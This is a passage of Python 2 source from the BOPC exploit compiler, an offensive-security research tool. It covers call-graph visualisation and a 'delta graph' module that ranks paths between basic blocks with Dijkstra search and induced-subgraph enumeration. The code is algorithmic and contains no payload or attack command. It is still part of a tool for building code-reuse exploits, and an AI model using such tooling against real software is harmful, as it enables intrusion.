-------------------------------------------------------------------------------\n        if options & VO_CAND:\n            # nodes['yellow' ] = get_nodes('cand')\n            # (<CFGNode frame_dummy+0x1f 0x40078fL[6]>, [(14, [...]), (16, [...])]),\n\n            for node, attr in nx.get_node_attributes(graph, 'cand').iteritems():\n\n                if func and node.addr not in func.block_addrs:\n                    continue\n\n                G.node('%x' % node.addr, label='%x' % node.addr,\n                        # label='%x\\n%s' % (node.addr, ', '.join(['%d' % uid[0] for uid in attr])),\n                        fillcolor='yellow', shape='box', style='filled')\n\n                nodeset.add(node.addr)\n\n        # -------------------------------------------------------------------------------\n        if options & VO_ACC:\n            # nodes['lawngreen'] = ['0x%x\\n%s' % (n.addr, ', '.join([str(x) for x in s]))\n            #                           for n, s in get_attr('acc')]\n            #\n            # (<CFGNode main+0x141 0x4009c6L[17]>, [14])\n            # print [(n,s) for n, s in get_attr('acc')]\n           \n            for node, attr in nx.get_node_attributes(graph, 'acc').iteritems():\n                if func and node.addr not in func.block_addrs:\n                    continue\n\n                G.node('%x' % node.addr, label='%x' % node.addr,\n                        # label='%x\\n%s' % (node.addr, ', '.join(['%d' % uid for uid in attr])),                            \n                        # fillcolor='lawngreen',\n                        shape='doubleoctagon', style='filled, bold')\n\n                nodeset.add(node.addr)\n\n        # -------------------------------------------------------------------------------\n        if options & VO_CLOB:        \n            # nodes['orangered'] = ['0x%x\\n%s' % (n.addr, ', '.join([str(x) for x in s])) \n            #                           for n, s in get_attr('clob')]\n            #\n            
# (<CFGNode _init 0x4005d0[16]>, set([16, 14])),\n            # print [(n,s) for n, s in get_attr('clob')]\n\n            for node, attr in nx.get_node_attributes(graph, 'clob').iteritems():\n\n                if func and node.addr not in func.block_addrs:\n                    continue\n\n                G.node('%x' % node.addr, label='%x' % node.addr,\n                        # label='0x%x\\n%s' % (node.addr, ', '.join(['%d' % uid for uid in attr])),                            \n                        fillcolor='orangered', shape='box', style='filled')\n\n                nodeset.add(node.addr)\n\n\n        # -------------------------------------------------------------------------------\n        # Entry point\n        # -------------------------------------------------------------------------------\n        if entry != -1:\n            G.node('%x' % entry, shape='box')  #, style='filled', fillcolor='gray')                \n            \n\n\n        # -------------------------------------------------------------------------------\n        # Then, draw the edges\n        # -------------------------------------------------------------------------------\n\n        # subgraph = graph.subgraph( nodes.get_nodes() )    \n        # print graph.nodes()\n\n        for u, v in graph.edges_iter():\n            #   if u.addr in nodes and v.addr in nodes:\n            #       G.edge('0x%x' % u.addr, '0x%x' % v.addr)\n\n            if u.addr in nodeset and v.addr in nodeset:\n                if (u.addr, v.addr) in path_edges:\n                    pass\n                    # G.edge('0x%x' % u.addr, '0x%x' % v.addr, #label='%d' % path_edges[u.addr, v.addr],\n                    #        color='deepskyblue', style='setlinewidth(3)', font='Arial Black', \n                    #        fontsize='30'#, fontcolor='purple'\n                    # )\n                else:\n                    G.edge('%x' % u.addr, '%x' % v.addr)\n\n\n        for (u, v) in path_edges:\n            
path_nodes.add( u )\n            path_nodes.add( v )\n\n        for (u, v) in path_edges:\n            G.edge('%x' % u, '%x' % v, # label='%d' % path_edges[u.addr, v.addr],\n                    color='blue', style='setlinewidth(5)', font='Arial Black', \n                    fontsize='30', fontcolor='purple'\n            )\n\n        '''\n        G.node('foo', label='', shape='doubleoctagon', fillcolor='white', style='filled, bold')\n        G.node('bar', label='      ', shape='ellipse')\n        G.node('baz', label='', shape='box')\n\n        G.node('A', label='', color='white', fillcolor='white')\n        G.node('B', label='', color='white', fillcolor='white')\n\n        G.edge('A', 'B', color='blue', style='setlinewidth(5)')\n        '''\n\n\n    # -----------------------------------------------------------------------------------\n    # Delta Graph\n    # -----------------------------------------------------------------------------------\n    elif gtype == VO_TYPE_DELTA:\n        # hardcoded addresses to keep from the first layer (it has too many nodes)\n        whitelist = [0x41dfe3, 0x41e02a, 0x407a1c, 0x403d4b, 0x403d6c, 0x407887, 0x404D5A]\n\n        # add invisible edges between layers to align them\n        for layer_from, layer_to in to_edges(__get_dg_layers(graph)):\n            nodes_1 = __get_dg_layer_nodes(graph, layer_from)\n            nodes_2 = __get_dg_layer_nodes(graph, layer_to)\n\n            # skip some nodes from the first layer (too many)\n            if layer_from == 2:\n                nodes_1 = [n for n in nodes_1 if n in whitelist]\n\n            if layer_to == 2:\n                nodes_2 = [n for n in nodes_2 if n in whitelist]\n\n            for n in nodes_1:\n                for m in nodes_2:\n                    G.edge('%d-%x' % (layer_from, n), '%d-%x' % (layer_to, m), color='transparent')\n\n\n        # test edges\n        #\n        # G.edge('6-403e4e', '16--1', color='transparent')\n        # G.edge('6-403fd9', '16--1', color='transparent')\n        #\n       
 # G.node('6-999999', color='transparent', fontcolor='transparent')\n\n        for node in graph.nodes():\n            print node, graph.in_degree(node), graph.out_degree(node)\n            uid, addr = node\n\n            # skip some nodes from the first layer (too many)\n            if uid == 2 and addr not in whitelist:\n                print '\\tDROP!'\n                continue\n\n            with G.subgraph(name='cluster_%d' % uid) as c:\n                \n                c.node_attr.update(style='filled', color='white')\n\n                # c.edges([('a0', 'a1'), ('a1', 'a2'), ('a2', 'a3')])\n                # c.attr(label='UID: %d' % uid, labelloc='t' if uid == 0 else 'b' )\n                c.attr(label='Statement #%d' % uid, style='setlinewidth(3)', color='gray35',\n                        labeljust='l', labelloc='t', fontcolor='gray35')\n\n                ''' \n                good = 0\n\n                for n in graph.in_edges(node):\n                    if graph[n[0]][node]['weight'] != INFINITY:\n                        good += 1\n                \n                for n in graph.out_edges(node):\n                    if graph[node][n[1]]['weight'] != INFINITY:\n                        good += 1\n\n                if good:\n                    c.node('%d-%x' % (uid, addr), label='0x%x' % addr)\n                '''\n               \n                c.node('%d-%x' % (uid, addr), font='Arial Black', \n                        label=('%x' % addr) if addr > 0 else '    -1    ')\n\n\n                # G.node('%d-%x' % (uid, addr), fillcolor='white', shape='box', style='filled')                \n                \n\n        dbg_arb(DBG_LVL_2, \"Path Edges:\", path_edges)\n\n        for u, v, w  in graph.edges(data=True):\n            print 'Edge', u, ' -> ', v\n            \n            if (u, v) in path_edges:\n                G.edge('%d-%x' % u, '%d-%x' % v, label=('%d' % w['weight']) if v[0] != 16 else '0',\n                        color='blue', 
style='setlinewidth(3)', font='Arial Black', \n                        fontsize='14', fontcolor='blue', constraint='false' \n                )\n\n                G.node('%d-%x' % u, color='blue', fontcolor='blue', style='setlinewidth(3)')\n                G.node('%d-%x' % v, color='blue', fontcolor='blue', style='setlinewidth(3)')\n\n            else:\n                if u[0] == 2 and u[1] not in whitelist:\n                    continue\n\n                if v[0] == 2 and v[1] not in whitelist:\n                    continue\n\n                if v[0] == 16:\n                    G.edge('%d-%x' % u, '%d-%x' % v, fontsize='14', label='0', constraint='false' )    \n                \n                elif w['weight'] != INFINITY:\n                    G.edge('%d-%x' % u, '%d-%x' % v, fontsize='14', label='%d' % w['weight'], \n                            constraint='false' )    \n\n                elif options & VO_DRAW_INF_EDGES:\n                    G.edge('%d-%x' % u, '%d-%x' % v, label='INF', constraint='false' )    \n        pass\n\n\n\n    # -------------------------------------------------------------------------\n    # Capability Graph\n    # ------------------------------------------------------------------------- \n    elif gtype == VO_TYPE_CAPABILITY:\n        # TODO: 1. Elaborate on call, etc.\n        #       2. 
No edge with weight=0 for statements on the same addr\n\n        get_attr  = lambda attr  : nx.get_node_attributes(graph, attr).iteritems()\n        get_nodes = lambda blkty : set([n.addr for n, _ in get_attr(blkty)])\n        get_stmt  = lambda stmt  : set([n for n, s in get_attr('type') if s == stmt])\n\n\n        for node, attr in graph.nodes(data=True):\n            color = {\n                'regset' : 'whitesmoke',\n                'regmod' : 'limegreen',\n                'call'   : 'turquoise2',\n                'cond'   : 'maroon1'\n            }[ attr['type'] ]\n\n            G.node('%d' % node, label='0x%x\\n%d - %s' % (attr['addr'], node, attr['type']),\n                fillcolor=color, shape='box', style='filled')\n\n        for u, v, w in graph.edges_iter(data=True):\n            G.edge('%d' % u, '%d' % v, label='%d' % w['weight'])\n\n\n    # ---------------------------------------------------------------------\n    # Save results to file\n    # ---------------------------------------------------------------------\n    #  G.view()\n\n    try:\n        G.save(filename + '.dot')\n        G.render(filename, view=True)\n    except IOError as err:\n        error(\"Cannot save figure: %s\" % str(err))\n        return False                            # failure\n\n    dbg_prnt(DBG_LVL_1, \"Done. Graph saved as %s.pdf\" % filename)\n\n    return True\n\n\n\n# -------------------------------------------------------------------------------------------------\n"
  },
  {
    "path": "source/delta.py",
    "content": "#!/usr/bin/env python2\n# -------------------------------------------------------------------------------------------------\n#\n#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  \n#   dP\"\"\"88\"\"\"\"\"\"Y8, ,d8P\"\"d8P\"Y8b,   dP\"\"\"88\"\"\"\"\"\"Y8,  ,88\"\"\"Y8b,\n#   Yb,  88      `8b,d8'   Y8   \"8b,dPYb,  88      `8b d8\"     `Y8\n#    `\"  88      ,8Pd8'    `Ybaaad88P' `\"  88      ,8Pd8'   8b  d8\n#        88aaaad8P\" 8P       `\"\"\"\"Y8       88aaaad8P\",8I    \"Y88P'\n#        88\"\"\"\"Y8ba 8b            d8       88\"\"\"\"\"   I8'          \n#        88      `8bY8,          ,8P       88        d8           \n#        88      ,8P`Y8,        ,8P'       88        Y8,          \n#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, \n#       88888888P\"     `\"Y8888P\"'          88          `\"Y8888888 \n#\n#   The Block Oriented Programming (BOP) Compiler - v2.1\n#\n#\n# Kyriakos Ispoglou (ispo) - ispo@purdue.edu\n# PURDUE University, Fall 2016-18\n# -------------------------------------------------------------------------------------------------\n#\n#\n# delta.py:\n#\n# This module is also the \"assistant\" of the symbolic execution engine along with the path module.\n# It implements the Delta Graph (DG). 
More details in the paper :)\n#\n# -------------------------------------------------------------------------------------------------\nfrom coreutils import *\nimport path as P\n\nimport networkx as nx\nimport Queue as queue                               # Python 2 name of the queue module\nimport heapq\n\n\n\n# ------------------------------------------------------------------------------------------------\n# Constant Definitions\n# ------------------------------------------------------------------------------------------------\n_NULL_NODE = -1                                     # null (non-existent) node\n_SINK_NODE = 0                                      # the sink node in delta graph\n\n\n\n# -------------------------------------------------------------------------------------------------\n# delta(): This class creates and processes the delta graph. The delta graph captures the\n#   distances (deltas) between accepted blocks.\n#\nclass delta( P._cs_ksp_intrl ):\n    ''' ======================================================================================= '''\n    '''                                   INTERNAL FUNCTIONS                                    '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __dijkstra_av(): This function finds the shortest path between source and destination\n    #       vertices using Dijkstra's algorithm. What is special about this algorithm is that it\n    #       avoids all vertices and edges that have the \"avoid\" attribute set.\n    #\n    # :Arg src: The source node\n    # :Arg dst: The destination node\n    # :Ret: A tuple (dist, path) that contains the shortest distance and the shortest path as a\n    #   list of vertices. 
If such a path does not exist, the function returns (-1, []).\n    #\n    def __dijkstra_av( self, src, dst, extra=None ):\n        Q = queue.PriorityQueue()                   # implement it using a priority queue\n        dist, prev = { }, { }                       # initialize maps\n\n\n        if 'avoid' in self.__d.node[ src ]:         # if source vertex must be avoided,\n            return -1, []                           # abort\n\n\n        for vtx, _ in self.__d.nodes_iter(data=True):\n            if vtx != src:                          # for all vertices except source\n                dist[vtx], prev[vtx] = INFINITY, -1 # initialize distances to INF\n\n\n        # queue entries are (distance, vertex) tuples, so the queue orders them by distance\n        dist[src], prev[src] = 0, _NULL_NODE        # source has distance 0\n        Q.put( (dist[src], src) )                   # add source vertex to the queue\n\n        ''' ------------------------------------------------------------------------- '''\n        ''' Main loop                                                                 '''\n        ''' ------------------------------------------------------------------------- '''\n        while not Q.empty():                        # while there are vertices in the queue\n            d, u = Q.get()                          # extract vertex with the smallest distance\n\n            if d > dist[u]:                         # stale entry? (a shorter path was found\n                continue                            # after this one was enqueued) skip it\n\n            if u == dst:                            # destination vertex found?\n                path, v = [], u                     # initialize vars\n\n                while v != _NULL_NODE:              # repeat until you reach the source\n                    path.insert(0, v)               # add vertex in reverse order\n                    v = prev[v]                     # move backwards\n\n                return dist[u], path                # success! return (dist,path)\n\n\n            for v in self.__d.neighbors(u):         # for each adjacent vertex\n\n                # if this vertex or its edge must be avoided, skip it\n                if 'avoid' in self.__d.node[ v ] or 'avoid' in self.__d[ u ][ v ]:\n                    continue\n\n\n                altd = dist[u] + self.__d[u][v]['weight']\n                if altd < dist[v]:                  # if alternative path is shorter\n                    dist[v] = altd                  # use it\n                    prev[v] = u\n\n                    Q.put( (altd, v) )              # and add it to the queue\n\n\n        return -1, []                               # no path. Failure\n\n    '''\n    # ---------------------------------------------------------------------------------------------\n    # __cost(): Calculate the cost of a given path.\n    #\n    # :Arg path: Path to work on\n    # :Ret: An integer containing the path's distance (cost).\n    #\n    def __cost( self, path ):\n        cost = 0\n\n        if len(path) > 1:\n            for i in range(len(path) - 1):          # for each vertex in the path\n                cost += self.__d.edge[ path[i] ][ path[i + 1] ]['weight']\n\n        return cost\n    '''\n\n    # ---------------------------------------------------------------------------------------------\n    # maxheap_obj: This class represents maximum-heap objects\n    # ---------------------------------------------------------------------------------------------\n    class __maxheap_obj( object ):\n        def __init__( self, tw, Hk ):           # store total weight and induced subgraph\n            self.tw = tw; self.Hk = Hk\n\n        def __eq__( self, obj ):                # == operator: Compare total weights\n            return self.tw == obj.tw\n\n        def __lt__( self, obj ):                # < operator: Invert condition\n            return 
self.tw > obj.tw             # with this trick min-heap becomes max-heap\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __enum_induced_subgraphs(): Enumerate all induced subgraphs with k nodes. Keep track of the\n    #   K minimum subgraphs by storing them on a max-heap. This function is recursive.\n    #\n    #   NOTE /!\\: Although this function has an exponential worst case complexity, in practice,\n    #       delta graphs are sparse so many of the combinations are truncated at the early stages.\n    #       In other words, this function is fast in practice.\n    #\n    # :Arg depth: The current recursion depth\n    # :Arg V: The current set of nodes that constitute the induced subgraph\n    # :Ret: 0 on success, or -1 if the maximum number of induced subgraphs has been reached.\n    #\n    # TODO: Optimization: When delta graph is flat, use Dijkstra\n    #\n    def __enum_induced_subgraphs( self, depth, V ):\n        # ---------------------------------------------------------------------\n        if depth == len(self.__bound):              # do we have a k-node induced subgraph?\n            Hk = nx.DiGraph()                       # create the induced subgraph\n            Hk.add_nodes_from( V )\n\n            Vs = set(V)                             # cast list to set to optimize searching\n            tw = 0\n\n            # iterate over edges in __G and keep those whose endpoints are both in the subgraph\n            for (u, v, w) in self.__G.edges_iter(data='weight'):\n                if u in Vs and v in Vs:\n\n                    # Induced subgraph nodes are indexed using (uid, addr) tuples\n                    Hk.add_edge(u, v, visited=False)\n                    tw += w                         # update total weight\n\n            if tw >= INFINITY:                      # discard subgraphs with INFINITY-weight edges\n                return 0\n\n            dbg_arb(DBG_LVL_3, \"Induced subgraph (Total Weight: %2d) found\" % 
tw, V)\n\n\n            if self.__k > 0:                        # if the heap doesn't have enough subgraphs yet\n                heapq.heappush(self.__heap, self.__maxheap_obj(tw,Hk))\n                self.__k -= 1\n            else:                                   # otherwise keep the K minimum weight subgraphs\n                if self.__heap[0].tw >= tw:\n                    heapq.heappushpop(self.__heap, self.__maxheap_obj(tw,Hk))\n\n\n            # Enumerating all induced subgraphs can take O(2^n) time. Although we truncated many\n            # solutions, the worst-case complexity still remains.\n            #\n            # Therefore, if we hit an upper bound we simply stop the enumeration.\n\n            self.__inc_ctr += 1\n            if MAX_ALLOWED_INDUCED_SUBGRAPHS != -1 and \\\n                self.__inc_ctr >= MAX_ALLOWED_INDUCED_SUBGRAPHS:\n                    return -1                           # maximum number of tries reached\n\n            return 0\n\n\n\n        # we always start from depth 1 (we have a single entry point)\n        cur = V[depth - 1]\n        uid = self.__uid[depth]\n\n\n        # ---------------------------------------------------------------------\n        for n in range(self.__bound[depth]):        # for each block in the current depth\n\n            # At this point we should check whether the selected node has a non-infinity\n            # distance to the others. This check is crucial as it can quickly eliminate\n            # most of the induced subgraphs.\n            #\n            # TODO: Elaborate.\n            #\n\n            nxt = self.__node_groups[depth][1][n]\n\n            #print self.__uid[depth], (cur, nxt)\n            #print self.__adj[ uid ]\n            #print self.__radj[ self.__uid[depth] ]\n\n            discard = False\n\n\n            # The problem here is the non-linearity. 
Although we're moving from depth X to X+1,\n            # it doesn't mean that we're going from statement X to X+1.\n            #\n            # The idea is, when adding node X+1, to check whether all incoming edges (from already\n            # visited nodes) have non-infinity cost and whether all outgoing edges (to already\n            # visited nodes) have non-infinity cost as well.\n            #\n\n            if uid in self.__radj:                  # check incoming edges\n                for x in self.__radj[ uid ]:\n                    y = self.__uid.index(x)\n\n                    if y >= depth:\n                        continue\n\n\n                    if not self.__G.has_edge(V[y], (uid,nxt)) or \\\n                        self.__G.get_edge_data(V[y], (uid,nxt))['weight'] == INFINITY:\n\n                            discard = True          # discard current solution\n                            break\n\n            if uid in self.__adj and not discard:   # check outgoing edges\n                for x in self.__adj[ uid ]:         # for each neighbor of the next node\n                    y = self.__uid.index(x)         # check if it's already in visited\n\n                    if y >= depth:                  # TODO: >= or > ?\n                        continue                    # skip if not\n\n                    if not self.__G.has_edge((uid,nxt), V[y]) or \\\n                        self.__G.get_edge_data((uid,nxt), V[y])['weight'] == INFINITY:\n                            discard = True\n                            break\n\n\n            # if self.__G.get_edge_data(V[depth], \n            #                           self.__node_groups[depth][1][nxt])['weight'] != INFINITY:\n            if not discard:\n                # recursively move on\n                if self.__enum_induced_subgraphs(depth + 1, V + [(uid,nxt)]) < 0:\n                    warn('Maximum number of induced subgraphs has been reached. 
'\n                         'Much Sad. Giving up recursing')\n                    return -1                       # quickly escape from recursions\n\n            # Node didn't work out. Try another one.\n\n        return 0\n\n\n\n    # ---------------------------------------------------------------------------------------------\n\n    ''' ======================================================================================= '''\n    '''                                     CLASS INTERFACE                                     '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __init__(): Class constructor. Create delta graph delta(CFG, M_v)\n    #\n    # :Arg graph: CFG to work on\n    # :Arg entry: Payload's entry point\n    # :Arg accepted: Dictionary of accepted blocks\n    # :Arg clobbering: Dictionary of clobbering blocks\n    # :Arg adj: Dictionary of the adjacency lists for accepted blocks\n    #\n    def __init__( self, graph, entry, accepted, clobbering, adj):\n        \"\"\"\n        # A sample graph to test things\n\n        self.__G = nx.DiGraph()\n        self.__G.add_nodes_from( ['e', 'A1', 'B1', 'B2', 'B3', 'C1', 'D1', 'D2'] )\n\n        self.__G.add_edge( 'e',  'A1', weight=0)\n        self.__G.add_edge( 'A1', 'B1', weight=30)\n        self.__G.add_edge( 'A1', 'B2', weight=2)\n        self.__G.add_edge( 'A1', 'B3', weight=4)\n\n        self.__G.add_edge( 'B1', 'C1', weight=1)\n        self.__G.add_edge( 'B2', 'C1', weight=2)\n        self.__G.add_edge( 'B3', 'C1', weight=3)\n\n        self.__G.add_edge( 'C1', 'D1', weight=2)\n        self.__G.add_edge( 'C1', 'D2', weight=1)\n\n        self.__G.add_edge( 'D1', 'A1', weight=5)        \n        self.__G.add_edge( 'D2', 'A1', weight=4)\n        self.__G.add_edge( 'D2', 'B2', weight=1)\n\n        self.__G.add_edge( 'D1', 'B1', weight=INFINITY)\n 
       self.__G.add_edge( 'D1', 'B2', weight=INFINITY)\n        self.__G.add_edge( 'D1', 'B3', weight=INFINITY)\n        self.__G.add_edge( 'D2', 'B1', weight=INFINITY)\n        self.__G.add_edge( 'D2', 'B3', weight=INFINITY)\n\n        self.__node_groups = accepted\n\n        # if you use the sample graph, use these node groups\n        self.__node_groups = [(0, ['e']), (6, ['A1']), (8, ['B1', 'B2', 'B3']), (10, ['C1']), \n                                (14, ['D1', 'D2'])]\n\n        adj       = { }\n        adj[0 ]   = [6]\n        adj[ 6 ]  = [8]\n        adj[ 8 ]  = [10]\n        adj[ 10 ] = [14]\n        adj[ 14 ] = [6, 8]\n\n        # self.__G.node['C']['avoid'] = 1\n        print self.__G.edges()  \n        print accepted\n        print adj\n\n        self.__entry = 'e'\n        self.__adj   = adj                          # store adjacency list\n\n        return\n\n        \"\"\"\n        dbg_prnt(DBG_LVL_1, \"Creating Delta Graph...\")\n\n\n        assert(MAX_ALLOWED_INDUCED_SUBGRAPHS != 0)\n\n        self.__adj = adj                            # store adjacency list\n        self.__node_groups = accepted\n\n        self.__d = nx.DiGraph()                     # the delta graph       \n        self.__entry = entry                        # payload's entry point\n\n        super(self.__class__, self).__init__(\n            self.__d, \n            self.__dijkstra_av, \n            # TODO: USE SPUR_DIJKSTRA ;) <--- No b/c we use induced subgraphs?\n            lambda node : node                      # identity function (access graph directly)\n        )\n\n        # object for CFG shortest paths\n        # cfg = P._cfg_shortest_path(graph, clobbering, adj)\n\n        blacklist = set()                           # blacklisted nodes from Delta Graph\n\n\n        # build the reverse adjacency list\n        self.__radj = { }\n\n        for a, b in self.__adj.iteritems():\n            for c in b:\n                self.__radj.setdefault(c, []).append(a)\n\n\n        
''' ------------------------------------------------------------------------- '''\n        ''' Main loop                                                                 '''\n        ''' ------------------------------------------------------------------------- '''\n        # self.__d.add_node(entry)                  # add entry node\n\n        # Easter Egg: When entry is -1, skip it and start directly from the 1st accepted block.\n        if entry != -1 and entry not in ADDR2NODE:  # check if entry point is valid\n            raise Exception('Entry point not found')\n\n\n        # for _, nxt in sorted(accepted.iteritems()):   # for each next level\n        for uid, cur in accepted:                   # for each next level\n\n            # if any node is not a valid basic block address, abort\n            if len(filter(lambda n : n not in ADDR2NODE and n != -1, cur)):\n                raise Exception('Node is not a valid address')\n\n\n            # filter out blacklisted nodes from the current set\n            cur = [node for node in cur if (uid, node) not in blacklist]\n\n\n\n            # The problem: It's possible for an accepted block to be accepted for more than one\n            # statement. If we index nodes in the Delta Graph using block addresses, we will end\n            # up reusing the same node at different \"levels\".\n            #\n            # To avoid this situation, we index nodes using a tuple (uid, address). 
\n            #\n            self.__d.add_nodes_from( zip([uid]*len(cur), cur) )\n\n                       \n            if uid not in self.__adj:               # the last layer (statement) has no neighbors\n                continue\n\n\n            for nxt in self.__adj[ uid ]:\n                # accepted = [(0, [4196485]), (6, [4197081L, 4196382]), ..., (24, [4196485])]\n\n                # get set of accepted blocks for the next statement\n                nxt_set2 = [b for (a, b) in accepted if a == nxt][0]\n\n                dbg_prnt(DBG_LVL_3, \"Delta Graph edges from (%d) '%s' to (%d) '%s'\" %\n                                        (uid, pretty_list(cur, ', '), \n                                         nxt, pretty_list(nxt_set2, ', ')))\n\n\n                nxt_set = [node for node in nxt_set2 if (nxt, node) not in blacklist]\n             \n                # if len(nxt_set) != len(nxt_set2):\n                #     warn('REDUCE FROM %d to %d' %(len(nxt_set2), len(nxt_set)))\n\n\n                # fully connect nodes from current to the next level (quadratic complexity)\n                for c in cur:                           # for each node in current level\n                    # print '-------------------------------------'\n                    \n                    # find paths to all nodes in the next level        \n                    cfg = P._cfg_shortest_path(graph, clobbering, adj)\n                    path = cfg.shortest_path(c, nxt_set, uid)\n\n                    # backdoor 2: wildcard return\n                    if len(nxt_set) == 1 and nxt_set[0] == -1: \n                        self.__d.add_edge((uid, c), (nxt, nxt_set[0]), weight=1)\n                        warn('ADD a wildcard return statement')\n                        del cfg\n                        continue\n\n\n                    # print '======================================='\n                    for n in range(len(nxt_set)):       # for each node in the next level\n                 
       # add an edge with cost their distance in CFG (or INF if edge does not exist)\n\n                        \n                        # Easter Egg checking\n                        if c == entry and entry == -1: \n                            self.__d.add_edge((uid, c), (nxt, nxt_set[n]), weight=0)                    \n\n                        # if next statement is on the same basic block\n                        # but next UID is smaller than current (we move backwards)\n                        elif c == nxt_set[n] and uid >= nxt:\n\n                            # find a loop (not a 0-distance path)\n                            loop, _ = cfg.shortest_loop(c, uid)\n\n                            self.__d.add_edge((uid, c), (nxt, nxt_set[n]), \n                                        weight=loop if loop >= 0 else INFINITY)\n                            pass\n\n                        else:\n                            # self.__d.add_edge(c, nxt_set[n], weight=path[n][0] \\\n                            #                           if path[n][0] >= 0  else INFINITY)\n                            #    \n\n                            self.__d.add_edge((uid, c), (nxt, nxt_set[n]), \n                                    weight=path[n][0] if path[n][0] >= 0 else INFINITY)\n\n                            pass\n\n                    del cfg\n\n\n                # -------------------------------------------------------------\n                # Optimization:\n                #\n                # Check if any nodes are totally disconnected from the previous\n                # layer. 
If so, they cannot be part of an induced subgraph, and\n                # therefore we can remove them.\n                # -------------------------------------------------------------\n                for n in range(len(nxt_set)):\n\n                    good = False\n\n                    for c in cur:\n                        if self.__d.has_edge((uid, c), (nxt, nxt_set[n])) and \\\n                            self.__d[(uid, c)][(nxt, nxt_set[n])]['weight'] != INFINITY:\n                                # n has at least one edge to the previous layer\n                                good = True\n\n                    if not good and self.__d.has_node( (nxt, nxt_set[n]) ):\n                    #    warn('edge (%d, %x) - (%d, %x) is missing. Add to blacklist.' % \n                    #           (uid, c, nxt, nxt_set[n]))\n                        self.__d.remove_node((nxt, nxt_set[n]))\n                        blacklist.add( (nxt, nxt_set[n]) )\n\n\n        '''\n        # NOTE: This is for flat delta graphs, where statement i goes to i+1\n\n        for a, nxt in accepted:                     # for each next level\n\n            print 'nxt', cur, nxt, a\n            # if any node is not a valid basic block address, abort\n            if len(filter(lambda n : n not in ADDR2NODE, nxt)): \n                raise Exception('Node is not a valid address')\n\n            self.__d.add_nodes_from( nxt )          # add nodes for the next level\n\n            # fully connect nodes from current to the next level (quadratic complexity)\n            for c in cur:                           # for each node in current level\n\n\n                print '-------------------------------------'\n                path = cfg.shortest_path(c, nxt)    # find paths to all nodes in the next level\n                print '======================================='\n                for n in range(len(nxt)):           # for each node in the next level\n                    # add an edge with cost their 
distance in CFG (or INF if edge does not exist)\n\n                    # TODO: remove cheating (backdoor)\n                    if c == entry: \n                        self.__d.add_edge(c, nxt[n], weight=7)                  \n\n                    else:\n                        self.__d.add_edge(c, nxt[n], weight=path[n][0] if path[n][0] >= 0 \\\n                                                                       else INFINITY)\n\n            cur = nxt                               # move 1 level deeper\n        '''\n\n\n        # Because we don't care in which node we'll end up, we add an additional sink node.\n        # The sink node is connected to all nodes in the last level\n        \n        # self.__d.add_node( _SINK_NODE )               # add sink node\n        # self.__d.add_edges_from( zip(nxt, [_SINK_NODE]*len(nxt)), weight=1 )\n\n        # at this point we have built the delta graph\n\n        # print self.__d.edges(data=True)\n\n        dbg_prnt(DBG_LVL_1, \"Delta graph created\")\n        dbg_prnt(DBG_LVL_3, \"Edges:\")\n\n        for a,b,c in self.__d.edges(data=True): \n            if c['weight'] == INFINITY:                       # skip infinity edges\n                continue\n\n            dbg_prnt(DBG_LVL_3, \"%d:%Xh -> %d:%Xh = %s\" % (a[0], a[1], b[0], b[1], str(c)))\n\n\n        self.__G   = self.__d\n        self.graph = self.__d\n\n        # for n in self.__G.nodes():\n        #     print hex(n)\n        # exit()\n        \n\n\n    # ---------------------------------------------------------------------------------------------\n    # k_min_induced_subgraphs(): Find the K minimum k-induced subgraphs. Unfortunately, we run into\n    #       NP-hardness here. Even worse, the problem can't even be approximated (see proof).\n    #       Therefore, brute force is the only solution here. 
So, we calculate all the induced\n    #       subgraphs (that contain exactly 1 accepted block from each statement), and keep track\n    #       of the K minimum solutions (we use a max-heap to optimize that).\n    # \n    #\n    #       NP-hardness proof:\n    #           TODO: Copy proof from here (and explain why there are no approximations):\n    #           https://cs.stackexchange.com/questions/85077/minimum-weight-k-induced-subgraph\n    #\n    #\n    # :Arg K: The number of traces to search for (up to K)\n    # :Ret: Function is a generator and works exactly as super.k_shortest_paths(): Each time it\n    #       returns a tuple (tw, Hk) which is the minimum induced subgraph Hk of G, with a total\n    #       weight of tw. If such a subgraph does not exist, the function returns (-1, empty_graph).\n    #\n    def k_min_induced_subgraphs( self, K ):\n        self.__k = K                                    # number of induced subgraphs\n\n        # when delta graph is flat, a k shortest path approach is sufficient:\n        #\n        # return super(self.__class__, self).k_shortest_paths(self.__entry, _SINK_NODE, K)\n\n    \n        # list with number of accepted blocks from each statement\n        self.__bound = [len(x) for _, x in self.__node_groups]\n        self.__uid   = [y      for y, _ in self.__node_groups]\n\n        self.__heap = []\n        heapq._heapify_max(self.__heap)             # create a max-heap (note: private heapq API)\n\n\n        dbg_prnt(DBG_LVL_3, \"Enumerating all induced subgraphs...\")\n\n        \n        # build the reverse adjacency list\n        self.__radj = { }\n\n        for a, b in self.__adj.iteritems():\n            for c in b:\n                self.__radj.setdefault(c, []).append(a)\n\n\n\n        dbg_arb(DBG_LVL_3, \"Adjacency List:\", self.__adj)\n        dbg_arb(DBG_LVL_3, \"Reverse Adjacency List:\", self.__radj)\n\n        # enumerate all induced subgraphs\n        self.__inc_ctr = 0\n        self.__enum_induced_subgraphs(1, [(0, self.__entry)] 
)\n        \n\n        dbg_prnt(DBG_LVL_3, \"Done. %d induced subgraphs found.\" % len(self.__heap))\n\n\n        inv  = []\n        none = True\n\n        while len(self.__heap):                     # for each minimum induced subgraph\n            obj = heapq.heappop(self.__heap)\n            inv.append(obj)                         # move objects from heap to a list\n\n\n        for obj in reversed(inv):                   # yield objects in reverse order\n            # print 'Inverse', obj.tw, obj.Hk.edges(data=True)\n\n            if obj.tw != INFINITY:\n                none = False\n                yield obj.tw, obj.Hk\n\n\n        if none:                                    # if we haven't yielded anything\n            yield -1, nx.empty_graph(create_using=nx.DiGraph())\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __enum_paths(): More recursion! Helper for flatten_graph().\n    #\n    # :Arg curr: Current node\n    # :Arg graph: The induced subgraph\n    # :Arg P: Current path\n    # :Arg __visited: Current set of visited nodes\n    # :Arg F: Lambda function to encode nodes in P (needed for pretty-print situations)\n    # :Ret: The updated path P.\n    #\n    def __enum_paths( self, curr, graph, P, __visited, F=lambda x: x ):\n        if curr in __visited:\n            return P\n\n\n        # __visited.add(curr)\n\n        if len(graph.neighbors(curr)) == 1:\n            